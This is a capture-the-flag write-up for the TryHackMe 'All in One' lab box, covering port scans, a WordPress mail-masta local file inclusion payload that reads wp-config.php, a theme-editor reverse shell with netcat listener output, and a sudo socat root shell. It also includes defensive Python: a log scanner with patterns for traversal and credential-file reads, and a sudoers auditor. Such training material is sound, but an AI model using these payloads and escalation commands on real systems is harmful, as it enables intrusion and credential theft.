THM: All in One

Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.201.7 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 00:06 BST
Nmap scan report for 10.10.201.7
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.18.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f4:a7:b4:9d:64:9c:9d:59:ea:0a:9a:90:11:0f:2a:6c (RSA)
| 256 b7:58:1c:19:c0:de:e3:52:72:86:7e:d4:a1:ff:74:37 (ECDSA)
|_ 256 4c:a3:82:d0:09:04:8e:92:f8:a4:db:51:c2:44:31:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.22 seconds
Website
Visiting the website we see just the standard Apache holding page, so we run a gobuster scan.
# gobuster dir -u http://10.10.201.7 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.201.7
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 276]
/wordpress (Status: 301) [Size: 314] [--> http://10.10.201.7/wordpress/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Visiting the wordpress directory we see a normal WordPress site, but nothing relevant, so we run a wpscan to check the plugins.
# wpscan --url http://10.10.201.7/wordpress/ -e u -e ap
WordPress Security Scanner by the WPScan Team
Version 3.8.28
...
...
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://10.10.201.7/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.201.7/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] reflex-gallery
| Location: http://10.10.201.7/wordpress/wp-content/plugins/reflex-gallery/
| Latest Version: 3.1.7 (up to date)
| Last Updated: 2021-03-10T02:38:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.201.7/wordpress/wp-content/plugins/reflex-gallery/readme.txt
...
...
Looking on exploit-db we see that the mail-masta plugin is vulnerable to Local File Inclusion (LFI). Using this we request wp-config.php through the php://filter wrapper with base64 encoding, so the file's PHP source is returned as text instead of being executed.
http://10.10.201.7/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
After we have decoded this from base64 we have the database username and password. Checking these credentials on the WordPress admin login we can see that they have been reused and we can log in.
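From the defender's side, the request above is easy to spot in the Apache access log. The following is an added example, not part of the writeup: a small Python log scanner that decodes each query parameter (including double percent-encoding) and flags PHP stream wrappers, directory traversal and reads of sensitive files. The log lines are constructed for testing; only the first two reuse the mail-masta request path shown above.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-log lines for offline testing (not captured from the box);
# the first two reuse the mail-masta request path shown in the writeup.
SAMPLE_LOG = """\
10.11.18.78 - - [24/Aug/2025:00:10:01 +0100] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 2310 "-" "curl/8.0"
10.11.18.78 - - [24/Aug/2025:00:10:05 +0100] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1805 "-" "curl/8.0"
10.11.18.78 - - [24/Aug/2025:00:11:09 +0100] "GET /wordpress/index.php?p=12 HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is matched against the fully percent-decoded value of every query parameter.
RULES = [
    ("php-wrapper", re.compile(r"^(php|data|expect|phar)://", re.I)),
    ("path-traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("sensitive-file", re.compile(r"wp-config\.php|/etc/(passwd|shadow)", re.I)),
]

def fully_decode(value, max_rounds=3):
    """Undo stacked percent-encoding (%252e -> %2e -> .) until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (time, ip, status, param, rule, value) tuples for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # parse_qsl decodes one layer; fully_decode catches double-encoded traversal
    for param, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = fully_decode(raw)
        for rule, rx in RULES:
            if rx.search(value):
                findings.append((m["ts"], m["ip"], m["status"], param, rule, value))
    return findings

def scan_log(text):
    return [f for line in text.splitlines() for f in scan_line(line)]

if __name__ == "__main__":
    for ts, ip, status, param, rule, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} HTTP {status} {rule:15} {param}={value}")
```

A 200 response on a flagged request (rather than a 403 from a WAF) is the signal that the inclusion actually worked and the file contents left the server.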
Using the theme editor we can insert our own malicious PHP to get a reverse shell back. We put it into the 404 page so we can trigger it by visiting a non-existent page.
Using this we get our shell.
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.201.7] 39812
Linux ip-10-10-201-7 5.15.0-138-generic #148~20.04.1-Ubuntu SMP Fri Mar 28 14:32:35 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
23:48:25 up 46 min, 0 users, load average: 0.00, 0.00, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Looking around the system we find an unusual file in the /etc/mysql/conf.d directory. Looking inside reveals credentials.
$ ls /etc/mysql/conf.d/
mysql.cnf
mysqldump.cnf
private.txt
$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: **********
Using these creds we can log in with SSH and get the user flag (after decoding it).
# ssh elyana@10.10.201.7
elyana@10.10.201.7's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-138-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 23 Aug 2025 11:51:34 PM UTC
System load: 0.0 Processes: 162
Usage of /: 76.1% of 6.38GB Users logged in: 0
Memory usage: 24% IPv4 address for ens5: 10.10.201.7
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sat Aug 23 23:51:35 2025 from 10.11.18.78
elyana@ip-10-10-201-7:~$ cat user.txt
VE********************************************************59
elyana@ip-10-10-201-7:~$ cat user.txt | base64 -d
THM{49************************************sn}
Privilege escalation
Checking elyana's sudo permissions we can see they have some.
elyana@ip-10-10-201-7:~$ sudo -l
Matching Defaults entries for elyana on ip-10-10-201-7:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elyana may run the following commands on ip-10-10-201-7:
(ALL) NOPASSWD: /usr/bin/socat
Looking for socat on GTFOBins we see there is a method we can use. Using this we get a root shell and can read the root flag.
elyana@ip-10-10-201-7:~$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
VE***********************************************************h9
cat /root/root.txt | base64 -d
THM{ue************************************i8}
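The root of this escalation is a sudoers rule that lets a user run a shell-capable program as root without a password. As an added example (not from the writeup), here is a Python audit that parses sudoers-style rules and flags commands which hand back a root shell, rating them higher when NOPASSWD is set. The sample rules are constructed; the elyana line mirrors the one reported by sudo -l above, and the SHELL_CAPABLE list is an assumed starting point, not an exhaustive one.

```python
import re
from os.path import basename

# Constructed sudoers-style lines for offline testing (not copied from the box);
# the elyana line mirrors the rule that `sudo -l` reported in the writeup.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
elyana  ALL=(ALL) NOPASSWD: /usr/bin/socat
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
deploy  ALL=(ALL) /usr/bin/systemctl restart nginx
%admin  ALL=(ALL) ALL
"""

# Programs that, run as root with caller-controlled arguments, hand back a root shell
# or unrestricted file access (the kind of entries GTFOBins catalogues). Assumed list.
SHELL_CAPABLE = {"socat", "bash", "sh", "python3", "perl", "vim", "tar", "rsync", "find", "awk"}

RULE_RE = re.compile(
    r"^(?P<user>[^#\s]+)\s+(?P<host>\S+?)\s*=\s*"   # user  host=
    r"(?:\((?P<runas>[^)]*)\)\s*)?"                 # optional (runas)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                    # tags such as NOPASSWD:
    r"(?P<cmds>.+)$"                                # comma-separated command list
)

def audit_rule(line):
    """Return (user, severity, reason) tuples for one sudoers line; empty if nothing to flag."""
    m = RULE_RE.match(line.strip())
    if not m:
        return []
    nopasswd = "NOPASSWD" in m["tags"]
    findings = []
    for cmd in m["cmds"].split(","):
        cmd = cmd.strip()
        if cmd == "ALL":
            continue  # unrestricted sudo is a deliberate grant, not a misconfigured allowlist
        prog = basename(cmd.split()[0])
        if prog in SHELL_CAPABLE:
            severity = "high" if nopasswd else "medium"
            runas = m["runas"] or "root"
            findings.append((m["user"], severity, f"{prog} as {runas} gives a root shell or file access"))
    return findings

def audit(text):
    """Audit every rule line of a sudoers file; comments and Defaults lines are skipped."""
    return [f for line in text.splitlines() for f in audit_rule(line)]
```

The fix for a flagged rule is to pin the exact arguments the user needs (or wrap them in a script owned by root) rather than granting the bare binary.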